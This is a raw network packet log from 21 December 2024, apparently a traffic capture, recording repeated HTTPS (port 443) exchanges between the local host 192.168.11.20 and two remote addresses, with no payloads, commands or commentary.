                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.600364923 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.600378990 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.600548029 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.602273941 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.602298021 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.602490902 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.602571011 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.602582932 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.602936029 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.605045080 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.605086088 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.605282068 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.605295897 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.605493069 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.605674982 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.607209921 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.607233047 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.607363939 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.607604980 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.607618093 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.607857943 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.609827042 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.609858036 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.610047102 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.610060930 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.610207081 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.610394955 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.709862947 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.709887981 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.710048914 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.710208893 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.710225105 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.710395098 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.710395098 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.711730003 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.711762905 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.711932898 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.711932898 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.711957932 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.712219000 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.712243080 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.713340044 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.713363886 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.713681936 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.713895082 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.713912010 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.714165926 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.715584993 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.715595961 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.715733051 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.715986967 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.715996027 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.716181040 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.716387987 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.718348980 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.718363047 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.718755007 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.718755007 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.718767881 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.718943119 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722012043 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722024918 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722203970 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722285986 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722291946 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722455978 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722474098 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722474098 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722490072 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722498894 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722883940 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.722883940 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.725265980 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.725276947 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.725632906 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.725632906 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.725646019 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.725986004 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.727787971 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.727799892 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.728091955 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.728102922 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.728286028 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.728286028 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.728465080 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.730027914 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.730038881 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.730184078 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.730366945 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.730377913 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.730590105 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.730590105 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.734399080 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.734411955 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.734611034 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.734611034 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.734625101 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.734878063 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.734878063 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.743891954 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.743905067 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.744193077 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.744375944 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.744375944 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.744385004 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.744635105 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.744966984 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.744978905 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.745115995 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.745254040 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.745260954 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.745491028 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.746005058 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.746016979 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.746208906 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.746388912 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.746388912 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.746396065 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.746577024 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.747309923 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.747323036 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.747493982 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.747765064 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.747772932 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.748145103 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.748243093 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.748255014 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.748437881 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.748617887 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.748617887 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.748625040 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.748858929 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.749473095 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.749485016 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.749942064 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.749942064 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.749955893 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.750101089 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.750293016 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.750444889 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.750458002 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.750606060 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.750782013 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.750787973 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.750793934 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.750838995 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.751071930 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.751245975 CET49754443192.168.11.20172.67.223.7
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:40.751255035 CET44349754172.67.223.7192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.046036005 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.046058893 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.046277046 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.050795078 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.050807953 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.322879076 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.323084116 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.325140953 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.325156927 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.325509071 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.336009026 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.378261089 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.946240902 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.946270943 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.946590900 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.946602106 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.948621035 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.948700905 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.948793888 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.948993921 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.949013948 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.949084044 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.949084044 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.949095964 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:47.949476957 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.076562881 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.077265978 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.077294111 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.077486992 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.077507973 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.077871084 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.084645987 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.090379953 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.090560913 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.090595961 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.090615034 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.090977907 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.099176884 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.107611895 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.107841969 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.107860088 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.116358995 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.116517067 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.116714954 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.116734028 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.116921902 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.124914885 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.137526989 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.137706041 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.137912989 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.137933016 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.138484955 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.142251968 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.191728115 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.191746950 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.194458961 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.194715023 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.194734097 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.203229904 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.203255892 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.203428984 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.203447104 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.203779936 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.213085890 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.217571974 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.217981100 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.217998981 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.232841969 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.232892036 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.233031034 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.233047962 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.233196020 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.233386993 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.247287035 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.247641087 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.247658014 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.248028994 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.257482052 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.257719994 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.263176918 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.263437033 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.270021915 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.270761013 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.277460098 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.277673006 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.284699917 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.284923077 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.290812016 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.291199923 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.298758984 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.299150944 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.312578917 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.312865973 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.312921047 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.313489914 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.323833942 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.324135065 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.327133894 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.327400923 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.332015991 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.332273960 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.336777925 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.336986065 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.340506077 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.340820074 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.344963074 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.345376015 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.357647896 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.357876062 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.360094070 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.360507965 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.360526085 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.360697031 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.363032103 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.363265038 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.373078108 CET44349755104.21.37.173192.168.11.20
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.373290062 CET49755443192.168.11.20104.21.37.173
                                                                                                                                                                                                                                                      Dec 21, 2024 21:04:48.373306990 CET44349755104.21.37.173192.168.11.20
